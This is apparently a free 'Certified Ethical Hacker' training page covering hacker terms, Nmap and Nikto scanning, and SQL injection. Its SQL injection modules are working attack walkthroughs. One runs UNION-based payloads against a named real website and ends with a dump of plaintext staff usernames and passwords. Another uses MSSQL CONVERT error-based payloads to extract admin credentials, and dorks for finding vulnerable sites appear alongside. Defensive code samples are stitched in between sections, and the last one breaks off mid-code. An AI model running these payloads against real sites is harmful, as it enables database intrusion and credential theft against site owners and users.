Free C|EH Training

Free Certified Ethical Hacker (C|EH) Training

 

Introduction

 

How to become a hacker? This is a very common question, asked many times, and people also search for it online. Becoming a hacker is not such a hard task, but it is not so easy either; the only things you need are dedication, interest, time and a little knowledge of the internet and programming. The rest of the knowledge you will pick up during the training period.


First of all, our team would like to welcome the newbies to the dark world of hacking. Yes, it is a dark world: once you get interested in hacking, you will never leave it. You will become addicted to hacking.

The very first thing needed to become a hacker is to have a hacker's attitude. You must have seen in Hollywood movies that the guy is working in a room with many computers and gadgets around him, with screens of different colours and so on. In reality, hacking is different from that; it was just there to create the atmosphere of hacking. Night, yes, night is a gift for hackers; all hackers tend to do their work at night.
Hackers always think about creating new applications and doing something creative. They never waste their time sleeping and enjoying themselves. One thing I have personally noted is that hackers love blogging; I have seen each hacker write many blogs.

If we look at the past, there were only a few hackers at that time, because back then a hacker needed expert knowledge of programming languages and a hacker's way of thinking; they used to write their own tools and find their own vulnerabilities, which was very difficult. Today anyone with basic knowledge can become a hacker, as many hacking tools and programs are available on the internet; the only things one must have are time and dedication. Follow more and more blogs and keep yourself updated on the cyber world.

With the increasing interest of people in Information Technology, the growing IT industry and the rise in cyber crime, the need for ethical hackers is also increasing. According to NASSCOM, the information security market in India is currently estimated at $500 million and growing by 20-30 percent annually; NASSCOM predicts that India will need 77,000 ethical hackers every year; and the global information security products and services market is estimated to grow to $79 billion by 2010.

So there is a good career in ethical hacking, because India does not produce the required number of security experts.
Choosing C|EH is a good idea to make your career bright. There are many other courses in the field of security, on which you can take advice from our experts after you have completed C|EH.

This is just the beginning of what you must know to enter the dark world of hacking. After reading this, you should proceed to the introductory part of hacking.






___________________________________________________________________________________

(Cyber Ethics :  Module 1)

________________________________________________________



________________________________________________________________
Hacking & Cracking
________________________________________________________________

"Hacking" is the activity of intruding into and exploiting computer systems or networks, and the art of exploring security breaches. Hacking has both positive and negative aspects. Activity done for a good purpose, with permission, is termed "hacking", and activity done illegally, out of greed, for the sake of money or to destroy, is termed "cracking". Both words mean the same thing; the only difference is in the intent. Cracking is an illegal activity, but hacking is legal. According to the Indian IT Act there is no difference between hacking and cracking: every act of breaking into a computer system or network is known as hacking and is illegal.
Some other terms are also used; please see them below.


________________________________________________________________

 Who Are Hackers
________________________________________________________________

 Hackers
Hackers are intelligent computer professionals who like to explore and learn about the back-end working of computers and networks. Hackers are experts in the field of computing. They find vulnerabilities in systems and share their knowledge through seminars and every other possible way to make people aware. There is a common misconception that hackers are the ones who break into computer security and networks for their own use.



________________________________________________________________

 Who Are Crackers
________________________________________________________________

Cracker
Crackers are those who break into computer and network security with malicious intent, for personal gain, revenge or money. They usually hack bank accounts and credit cards, cause defacements and can cause financial losses. They are cyber criminals.



_____________________________________________

 What Is Script Kiddies

_____________________________________________

 Script Kiddies

Script kiddies are those who are new to the field of hacking. Mostly they are tracked down by the police because they do not know how to protect themselves or stay anonymous. They do not have any technical hacking skills and use tools developed by other hackers without knowing what is happening behind the screen.
They are learners, and they enjoy hacking email accounts and the like.
They usually hack for fun!


_____________________________________________

Black Hat Hackers

_____________________________________________


They are known as the bad guys and use their skills for illegal activities in a destructive manner, to take revenge and to gain money. They find vulnerabilities and later exploit them. They hack for their own ends!



_____________________________________________

 White Hat Hackers

_____________________________________________

They are known as the good guys and use their skills in a good and constructive manner. They find vulnerabilities and loopholes, and their solutions. They usually share their knowledge to make people aware.



_____________________________________________

 Who Are Phreakers

_____________________________________________


Phreakers are those who use computer applications and networks to hack into phone networks. They find loopholes in phone networks with the intent of making free calls. They can be responsible for a huge phone bill without you ever using the service.

_____________________________________________

Hackers Strategies

_____________________________________________

  
"Every hacker uses some predefined steps to hack a target system."

Reconnaissance : Basic information gathering about the target is known as reconnaissance.

Scanning : Scanning is the process of probing the target system for open ports and the services running on it.

Gaining Access : Gaining access to, or control of, the target system by exploiting it.

Maintaining Access : Keeping access to the system even after leaving it.

Clearing Tracks : Removing the footprints left behind so as to remain undetected and safe from the victim.

___________________________________________________________________________________

Information Gathering
( Module 2 )
___________________________________________________________________________________

Reconnaissance is also known as information gathering. Reconnaissance is the process of collecting information from different places on the internet about any individual, company, organisation, server, IP address or criminal.

Information gathering, or reconnaissance, is the first step of hacking, and most of a hacker's time is spent in this phase: 90% of a hacker's time goes into information gathering and the remaining 10% into attacking and gaining access. Information gathering plays a vital role for both investigative and attacking purposes.

________________________________________________________________

Investigators Point Of View

________________________________________________________________

For an investigator, information gathering is a powerful tool used in an investigation. An investigator will gather information such as traces of the criminal, name, address, contact number, company information and so on before taking any legal action. Investigators use tools and social networking sites to gather information about a criminal.

________________________________________________________________

Attackers Point OF view

________________________________________________________________

Information Gathering As Attacker's Point Of View

An attacker will first gather information such as the domain name, IP address, IP range, operating system, services, control panel and vulnerable services, and later exploit it. Attackers use tools and social engineering to gather information. To attack an individual, the attacker will find the person's name, address, date of birth, phone number and other personal information, and then use that information against them.

________________________________________________________________

 Information Gathering Tools & Sites

  ( Search Engines & Social Networking)

________________________________________________________________

Search Engines
The internet is within reach of every person, and everyone leaves footprints while surfing it. Every hacker and investigator uses search engines for information gathering.


Google and Yahoo give the best results of all the search engines. Kartoo and Maltego are relational search engines: they retrieve results from different search engines and draw connections between them.


Kartoo >> www.kartoo.com


Maltego >> www.maltego.com
Maltego is an open source intelligence and forensics application. It helps in mining and gathering information.


Social Networking


Information gathering can also be done through blogs and forums, which everyone uses for knowledge. Today is the world of social networking, and almost all internet users use social networking sites for networking purposes. Some of the social sites with the largest number of users are:



www.orkut.com







Job sites are used by almost every professional for job hunting, so for an investigator as well as an attacker, job sites are very useful for information gathering.


Some other websites used for information gathering are :




________________________________________________________________


Reverse Ip Mapping
________________________________________________________________


Reverse Ip mapping
Using reverse IP lookup we can find the number of websites hosted on a server. If a single website on that server is vulnerable, an attacker can compromise all the websites hosted on the same server and can easily root that server.



________________________________________________________________

 Who Is Database
________________________________________________________________


The whois database is the database used to find information about websites. It provides information about the owner of the website, the email used to register the domain, the address, the domain registrar, server information and much more.

We can find server information by running an nslookup query in cmd.

Cmd
C:\user\nslookup best4hack.blogspot.com


________________________________________________________________

 Email Spiders
________________________________________________________________

Email spiders

Email spiders are automated programs that collect and capture email IDs and store them in a database. Spammers mainly use email spiders to collect thousands of email addresses for spamming.

___________________________________________________________________________________
Scanning
(Module 3)
___________________________________________________________________________________

Scanning : What Is Port Scanning


Long ago, ports were scanned by connecting to each one manually with telnet. Today people use more sophisticated programs with powerful methods to scan IP ranges for a large number of ports.
Scanning is the process of finding open and closed ports and vulnerabilities in remote systems, servers and networks. Scanning will reveal IP addresses, the operating system and the services running on a remote computer.


There are three types of scanning:
1. Port Scanning
2. Network Scanning
3. Vulnerability Scanning


Port Scanning : Port scanning is one of the most popular techniques attackers use to discover the services they can break into.

>> All machines connected to a LAN or to the internet via modem run many services that listen on well-known and not-so-well-known ports.
>> Ports 1 to 65535 are available on a computer.
>> By port scanning, the attacker finds out which ports are open.

Ports : Port numbers are unique only within a computer system.
>> Port numbers are 16-bit unsigned numbers.
>> The port numbers are divided into three ranges.

1. Well-known ports (0-1023)
2. Registered ports (1024-49151)
3. Dynamic and/or private ports (49152-65535)

Some well-known ports:
>> echo        7/tcp     Echo
>> ftp-data    20/udp    File transfer (default data)
>> ftp         21/tcp    File transfer (control)
>> ssh         22/tcp    SSH remote login protocol
>> telnet      23/tcp    Telnet
>> smtp        25/tcp    Simple Mail Transfer Protocol
>> whois       43/tcp    Whois server
>> domain      53/udp    Domain name server
>> www-http    80/tcp    World Wide Web HTTP

Some registered ports:
>> wins        1512/tcp        Microsoft Windows Internet Name Service
>> radius      1812/udp        RADIUS authentication protocol
>> yahoo       5010            Yahoo! Messenger
>> x11         6000-6063/tcp   X Window System



________________________________________________________________
 Nmap Port Scanner
________________________________________________________________


This article covers the practical side of Nmap: how to perform a quick scan to learn about open ports and services.
Nmap was originally a command line tool developed only for Unix/Linux based operating systems, but a Windows version is now available and easy to use. Download the Nmap installer for Windows; on Linux, open a terminal and type sudo apt-get install nmap.



OK, now we are going to start with a simple scan. For Nmap's help, run

$ nmap --help

For a quick and simple scan use.

$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-08 23:06 PKT
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 6.22 seconds
Is that a simple scan? Yes, it is a simple scan that tells you the open ports on a machine. If you want to scan a whole network, give the address with its subnet:

$ nmap 192.168.1.1/24
$ nmap 192.168.1.*


Nmap - Interesting options

-f fragments packets

-D Launches decoy scans for concealment

-I IDENT Scan – finds owners of processes (on Unix systems)

-b FTP Bounce

Port Scan Types

TCP Connect scan

TCP SYN scan

TCP FIN scan

TCP Xmas Tree scan (FIN, URG, and PUSH)

TCP Null scan

TCP ACK scan

UDP scan 
Nmap works on the basic scanning types like:

TCP connect() scanning
TCP SYN scanning
TCP FIN scanning 
Fragmentation scanning 
TCP reverse ident scanning 
FTP bounce attack 
UDP ICMP port unreachable scanning 
UDP recvfrom() and write() scanning 
ICMP echo scanning
Operating system detection, or OS fingerprinting, is an important part of scanning: you need to know the target machine's operating system to pick an exploit that applies to it. Nmap can tell you the running operating system; you could also find it by banner grabbing, but why do extra work? Use -O for operating system detection.
$ nmap -O 192.168.1.1
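To turn the scan output shown above into something a defender can act on, here is an added example (not part of the original page or of the Nmap project) that parses a report in the format Nmap 5.21 prints, labels each port with the IANA range from the list earlier in this module, and flags open listeners that are either outside an allowlist or run a cleartext service. The report text and the allowlist are constructed sample data.

```python
import re

# Constructed sample modelled on the Nmap 5.21 report shown in this module.
SAMPLE_REPORT = """\
Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-08 23:06 PKT
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 6.22 seconds
"""

# Services that carry logins or data in clear text; an open listener on
# one of these is usually a finding by itself (replace with ssh/https).
CLEARTEXT_SERVICES = {"ftp", "telnet", "http", "pop3", "imap", "smtp"}

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
NOT_SHOWN = re.compile(r"^Not shown: (\d+) (\w+) ports")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def port_range(port):
    """Name of the IANA range the module lists for this port number."""
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic/private"


def parse_report(text):
    """Return one dict per host: address, summary line and parsed port rows."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            current = {"host": m.group(1), "ports": [], "not_shown": None}
            hosts.append(current)
            continue
        if current is None:
            continue  # banner lines before the first host
        m = NOT_SHOWN.match(line)
        if m:
            current["not_shown"] = (int(m.group(1)), m.group(2))
            continue
        m = PORT_LINE.match(line)
        if m:
            port = int(m.group(1))
            current["ports"].append({
                "port": port,
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "range": port_range(port),
            })
    return hosts


def review(hosts, allowed):
    """Flag open ports not in `allowed` (a set of (port, proto)) and
    open ports whose service name is a known cleartext protocol."""
    findings = []
    for h in hosts:
        for p in h["ports"]:
            if p["state"] != "open":
                continue
            if (p["port"], p["proto"]) not in allowed:
                findings.append((h["host"], p["port"], p["proto"], "not in allowlist"))
            if p["service"] in CLEARTEXT_SERVICES:
                findings.append((h["host"], p["port"], p["proto"],
                                 "cleartext service " + p["service"]))
    return findings


if __name__ == "__main__":
    # Constructed allowlist: only the web server is expected on this host.
    for finding in review(parse_report(SAMPLE_REPORT), {(80, "tcp")}):
        print(finding)
```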


________________________________________________________________ 
 Nikto Vulnerability Scanner
________________________________________________________________

Nikto Vulnerability Scanner


In the field of web application security there are many tools available to measure the security of a web application; they are available for different operating systems and can be used to find bugs in a web application. Among these tools we also have Nikto.


Nikto is not a new tool; it is used by a large community to find vulnerabilities in web applications.



->Nikto is open source
->It can check a web server for over 6400 potentially dangerous files/CGIs
->It checks for outdated versions of over 1000 servers, and version-specific problems on over 270 servers
->It checks plugins and configuration files
->Fast
->Effective
->It finds default files and programs
->It finds insecure files and programs


Key Features
->Full HTTP proxy support
->Apache user name enumeration
->Logging to Metasploit
->Secure Sockets Layer (SSL) support
->Subdomain brute forcing (guessing)
->Easy to update
->Save reports in multiple formats


Requirements
->An operating system with Perl installed
->OpenSSL: http://www.openssl.org/
->ActiveState Perl: http://www.activestate.com/


Nikto Tutorial
->The basic scan requires a host to scan; you can use the server's IP or just its host name.


$ perl nikto.pl -h [target host]


->For help


$ perl nikto.pl -H


->If you want to check a different port, use


$ perl nikto.pl -h [target host] -p [port number]

->If you want to run the test via a proxy, use this command


$ perl nikto.pl -h [target host] -useproxy http://localhost:8080/


->Now, for updating Nikto, use




________________________________________________________________
 Webcruiser Vulnerability Scanner
________________________________________________________________

Webcruiser Vulnerability Scanner


WebCruiser is a web vulnerability scanner that performs basic and some advanced scanning. The good thing is that this tool does not require you to be any kind of specialist; anyone with a little knowledge of scanners can run it, and it will also help you to increase your knowledge.





Features of WebCruiser:
- Crawler (site directories and files);
- Vulnerability scanner (SQL injection, cross-site scripting);
- POC (proof of concept): SQL injection and cross-site scripting;
- GET/POST/Cookie injection;
- SQL Server PlainText/FieldEcho(Union)/Blind injection;
- MySQL FieldEcho(Union)/Blind injection;
- Oracle FieldEcho(Union)/Blind injection;
- DB2 FieldEcho(Union)/Blind injection;
- Password hash of SQL Server/MySQL/Oracle administrator;
- Time delay for search injection;
- Auto get cookie from web browser for authentication;
- Auto check database type;
- Auto get keyword;
- Multi-thread;
- Advanced: proxy, escape filter.

How to identify SQL injection with WebCruiser?

1. Input the URL, or right-click a vulnerability, select SQL Injection POC, then click "Get Environment Information".

2. If you need more information, switch to "POC[DataBase]" and scan.

What's missing in WebCruiser?
It would have been best if there were some interface that would take our custom input and scanner and return the result, so we could also test for known vulnerabilities or zero-days that are not incorporated in this version.

Download WebCruiser here


___________________________________________________________________________________
SQL Injection
(Module 4 :Hacking Webservers)
___________________________________________________________________________________
Basic SQL Injection
________________________________________________________________

SQL injection is a flaw in web application development. It is not a database or web server problem. Many programmers are still not aware of this problem, and a lot of tutorials and demo "templates" are vulnerable. Even many of the solutions posted on the internet are not good enough. In penetration tests, over 60% of clients turn out to be vulnerable to SQL injection.





// Hey guys, this is a most important flaw. Please read the full tutorial, as this is just the basics of SQL injection. //

Impact of SQL Injection:
* Access the entire database schema.
* Steal, modify and delete database contents.
* Prevent legitimate access to the database.
* Run operating system commands on the database server.
* Disclose company proprietary data.

Common vulnerable login query:
* SELECT * FROM users WHERE login='victor' AND password='123'
* var sql = "SELECT * FROM users WHERE login='" + formusr + "' AND password='" + formpwd + "'";



Injecting through strings:
* formusr = ' or 1=1--
* formpwd = anything
* SELECT * FROM users WHERE login='' or 1=1-- AND password='anything'

The power of '
* It closes the string parameter.
* Everything after it is considered part of the SQL command.

Some standard SQL commands, such as
"SELECT", "INSERT", "UPDATE", "DELETE", "CREATE" and "DROP", can be used to accomplish almost everything one needs to do with a database.

You have seen URLs like www.freeceh.in/news.asp?ArticleID=10 many times.
This link tells the site to look in the table that stores the article names for an article whose "ArticleID" is 10.
"INFORMATION_SCHEMA" holds the names of every table and column on a site. On every SQL server there will be an "INFORMATION_SCHEMA", and its name never changes.

Understanding error messages:
* Example: www.freeceh.in/index.php?id=1
* Add ' or /* after id=1 to check whether the site is vulnerable or not.
* If the site gives an error, it is vulnerable to SQL injection.
* If a blank page is shown, the site is vulnerable to blind injection.

Now, finding the vulnerable columns:
* Example: www.freeceh.in/index.php?id=1+order+by+1--
* Increase the ORDER BY number until you get an error message such as "Unknown column in 'order clause'".
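The login query above is the whole story of this flaw, so here is an added example (not code from the original page) that builds the same query two ways against a constructed in-memory SQLite table: once by string concatenation, exactly as the "var sql" line does, and once with bound parameters. The constructed user "victor" with password "123" and the ' or 1=1-- input are the values the module uses.

```python
import sqlite3


def make_db():
    # Constructed sample table: one user, plaintext password for the demo only.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('victor', '123')")
    conn.commit()
    return conn


def build_vulnerable_sql(formusr, formpwd):
    # The module's "var sql = ..." line: user input is pasted into the
    # command text, so a quote in the input ends the string literal and
    # everything after it becomes SQL.
    return ("SELECT * FROM users WHERE login='" + formusr +
            "' AND password='" + formpwd + "'")


def login_vulnerable(conn, formusr, formpwd):
    """True if the concatenated query returns a row (login 'succeeds')."""
    return conn.execute(build_vulnerable_sql(formusr, formpwd)).fetchone() is not None


def vulnerable_sql_error(conn, formusr, formpwd):
    """Error text the database returns for the concatenated query, or None.
    A lone quote producing an error is the 'tick test' the module describes:
    the application has let the input reach the SQL parser unescaped."""
    try:
        conn.execute(build_vulnerable_sql(formusr, formpwd))
        return None
    except sqlite3.Error as exc:
        return str(exc)


def login_parameterized(conn, formusr, formpwd):
    """Same check with bound parameters: the driver passes the input as a
    value, so a quote or -- inside it is just characters to compare."""
    sql = "SELECT * FROM users WHERE login=? AND password=?"
    return conn.execute(sql, (formusr, formpwd)).fetchone() is not None


def demo():
    conn = make_db()
    injected_user, injected_pwd = "' or 1=1--", "anything"
    return {
        "vuln_valid": login_vulnerable(conn, "victor", "123"),
        "vuln_injected": login_vulnerable(conn, injected_user, injected_pwd),
        "vuln_tick_error": vulnerable_sql_error(conn, "'", "x"),
        "param_valid": login_parameterized(conn, "victor", "123"),
        "param_injected": login_parameterized(conn, injected_user, injected_pwd),
        "param_tick_error": None,  # placeholder: parameterized query cannot fail to parse
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The concatenated form lets ' or 1=1-- log in without a password because the query collapses to SELECT * FROM users WHERE login='' or 1=1; the parameterized form treats the same text as a login name that matches nobody.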


 ________________________________________________________________
 Hacking Webserver by SQL Injection
________________________________________________________________


Basic SQL injection walkthrough with bizjournal.com as the example (not vulnerable now).

You can find many vulnerable websites using dorks.

Code:
http://www.bizjournal.com/content/article.php?id=124


The first thing you'll do is point your browser to that site then add a tick at the end of it.



 Code:
http://www.bizjournal.com/content/article.php?id=124'


Success! You will get the valuable SQL error that you're looking for.


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'\' ORDER BY id ASC LIMIT 0, 1' at line 1

Now it is time to discover how many columns the database query has.
The easiest way to do this is with the SQL "ORDER BY" clause.
There are many other ways to do this, but this is the way I use.
So first you take the URL and add "order by 1--" to the end of it:


Code:
http://www.bizjournal.com/content/article.php?id=124 order by 1--

You'll notice that the site loads normally, because the query has at least one column.
The next thing is to make the id a negative integer, so that you don't get all of the real content from the site and it is cleaner to see what you're doing.

http://www.bizjournal.com/content/article.php?id=-124 order by 1--

Notice it is a negative 124 now "-124"

Now it's time to find out just how many columns it has. You do this by increasing the ORDER BY number:


Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--
http://www.bizjournal.com/content/article.php?id=-124 order by 2--
http://www.bizjournal.com/content/article.php?id=-124 order by 3--
http://www.bizjournal.com/content/article.php?id=-124 order by 4--
http://www.bizjournal.com/content/article.php?id=-124 order by 5--
http://www.bizjournal.com/content/article.php?id=-124 order by 6--
http://www.bizjournal.com/content/article.php?id=-124 order by 7--
http://www.bizjournal.com/content/article.php?id=-124 order by 8--
http://www.bizjournal.com/content/article.php?id=-124 order by 9--
http://www.bizjournal.com/content/article.php?id=-124 order by 10--
http://www.bizjournal.com/content/article.php?id=-124 order by 11--

Success! It errors on "order by 11--" because there aren't 11 columns in the query.
So now that we know we have only 10 columns, we move on to a new statement, "UNION SELECT ALL".
This can be done a number of ways too, but this is the way I do it.


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,4,5,6,7,8,9,10--


What this does is query the database and show which columns have their data displayed on the page.
Notice that we have data displayed in columns 2, 3 and 4.
The next step is to get the website's database version. We do this with a simple "@@version"
in place of one of the numbers that is displayed; I will use 4.


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,@@version,5,6,7,8,9,10--

This will return the database version in the site where the number 4 was located.
Our version is:
5.0.67-log

The next step is to get the table names. This is where a lot of tutorials fall short, because the simple
from information_schema.tables--
does not return just the user-created tables; it shows a lot of garbage such as CHARACTER_SETS, COLLATIONS, etc.
What we will do is add to this with:
from information_schema.tables WHERE table_schema=database()--

To make this work on the site we need to use the "group_concat" function to display the tables:
group_concat(table_name)

For columns:
group_concat(column_name)

Example:


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(table_name),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--


Ahh now we have the user created table names:

Code:
archives,articles,articles2,digest,edition,events,
links,nomination,sections,staff,survey

Now you need to look at the table names and decide which one would hold sensitive data; to me,
"staff" looks like a good choice.
So we will remember that for a minute.

Next we will get the column names from the database with:
group_concat(column_name) from information_schema.columns where table_schema=database()--




Code:
id,date,title,by,abstract,body,section,keywords,photo,id,date,title,
author,abstract,body,section,keywords,photo,caption,caption2,caption3,
caption4,lead,id,date,title,author,abstract,body,section,keywords,photo,
caption,caption2,caption3,caption4,lead,id,date,title,city,body,id,volume,
number,date,id,title,body,month,day,year,date,time,time2,location,cost,
contact,phone,email,url,approved,id,url,title,category,description,id,date,
nominator,nominatortitle,nominatorcompany,nominatoraddress,nominatorcity,
nominatorstate,nominatorzip,nominatorphone,nominatorfax,nominatoremail,
nomineecompany,nomineeaddress,nomineecity,nomineestate,nomineezip,
nomineephone,nomineefax,nomineeweb,reason,reasonother,sat1,sat2,sat3,sat4,
sat5,ethics1,ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,
dev1,dev2,dev3,dev4,dev5,dev6,dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,
lead6,quality1,quality2,contact1name,contact1title,contact1phone,
contact1email,contact2name,contact2title,contact2phone,contact2email,
contact3name,contact3title,c

Now you need to sift through these column names and find the ones of interest to us. But what happens when you don't see a column like username or password?

Well, sometimes some of the columns are cut off; notice the "contact3title,c" at the end of the list.
Now it's time to do a little guessing, and this time it's easier than most: username and password are both common column names.

So to check the columns we will use "group_concat" again, but with our guessed column names, and instead of:
from information_schema.tables where table_schema=database()--
we will use:
from staff--
Remember, I told you to remember the table name from earlier.

To give you an idea of what a wrong column name looks like, it will look like this:
Note: 0x3a is the hex code for the colon ":"

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10 from staff--

But we will try username and password this time.


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from staff--


Bingo! We have a short list of usernames and passwords, and they aren't even hashed:

Note: I am not responsible for any misuse of this tutorial. This is just for educational purposes.
________________________________________________________________
Hacking Microsoft SQL Server
________________________________________________________________



There are various types of SQL injection against Microsoft SQL Server, as follows:

1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack

Here I am going to explain the first one, "SQL injection with CONVERT".

STEP 1:

First we need to find a vulnerable site.

Add a single quote ('), a double quote (") or a semicolon (;) to the field under test.

eg:
http://www.example.com/news.asp?id=10'
http://www.example.com/news.asp?id=10;

The site is vulnerable to SQL injection if the output shows an error like this:

[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

The error could also look like the one below:

Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4

If errors like the above are shown, the site could be vulnerable to SQL injection.

You can also find vulnerable sites with a Google dork.

e.g.

inurl:age.asp?id=
inurl:index.asp?sid=
You can see SQL dorks in my old posts.
STEP 2:

Now we have our vulnerable website.
The CONVERT function is used to convert between two data types; when the specified data cannot be converted to the other type, an error is returned, and that error carries the value.

We start our assessment by finding the MSSQL version and the database name.

http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)


 [http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

/includes/templates/header.asp, line 21

-----------------------------------------------------------

We now know it is Microsoft SQL Server 2005 and the OS is Windows Server 2003 (Build 3790: Service Pack 2).

Let's enumerate the database name.

http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--

[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'IPC' to data type int.

/includes/templates/header.asp, line 21
------------------------------------------------------------

The database name is IPC.

http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The database user the application runs as is ipcdc.

STEP 3:

Now let's find the tables in the database.

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--

"information_schema.tables" stores information about the tables in the database, and it has a field called "table_name"
which holds the name of each table. "SELECT TOP 1" returns the first table in the database.
The result of this request is something like this:

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

From this error we know the first table is "siteStatus". The next step is to look for the second table:
we simply append a WHERE clause to the query in the request above.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The second table is 'headerGraphic'.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
The third table is 'admin'.

In this way you get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic','admin')))--

If the query returns something like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

it means the database contains only three tables: 'siteStatus', 'headerGraphic' and 'admin'.

STEP 4:

Now we are all set, and we will find the columns in the admin table.

We merely change "information_schema.tables" to "information_schema.columns" and "table_name" to "column_name",
but we have to add "table_name" to the WHERE clause in order to specify the table whose column names we pull.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'+and+column_name+not+in+('username')))--

The response will be:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'passwd' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
So the second column is 'passwd'.

Continue like we did with the URL manipulation for tables.
Don't forget to extend the WHERE clause each time, until you get an error like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

STEP 5: RETRIEVING USERNAME AND PASSWORD, etc.

Now let's see what we got from above:

table_name: 'admin', 'siteStatus' and 'headerGraphic'

Here we are interested in 'admin', so we found the columns of 'admin':

column_name: 'username' and 'passwd'

Let's do our work now.

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+username+from+admin))--
You will get the first username in the error,
e.g. sa_admin
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+passwd+from+admin))--

You will get the passwd,
e.g. comic123


So you own the MSSQL server with

USERNAME: sa_admin
PASSWORD: comic123

Note:
1) You can use either AND or OR.
2) Don't forget the , (comma) after 'int' in convert().
3) In the error, what follows the ' (single quote) is your table_name, column_name, etc.
4) You can enumerate more usernames and passwords by using the NOT IN clause.
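From the defender's side, every request in steps 2 to 5 carries the same small set of strings (convert(int, …), @@version, db_name(), user_name(), information_schema.tables/columns, select top 1), and each one that succeeds draws a 500 error page. The following is an added example, not code from the original page: a small log scanner that URL-decodes the query string of each access-log line, matches those signatures, and counts per source IP how many probes were sent and how many produced an error page. The log lines are constructed for this example; the field layout (date, time, client IP, method, path, query, status) is an assumption, and the regexes are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (fields: date time client-ip method
# uri-stem uri-query status). Made up for this example; the queries mirror
# the probe strings the tutorial above describes.
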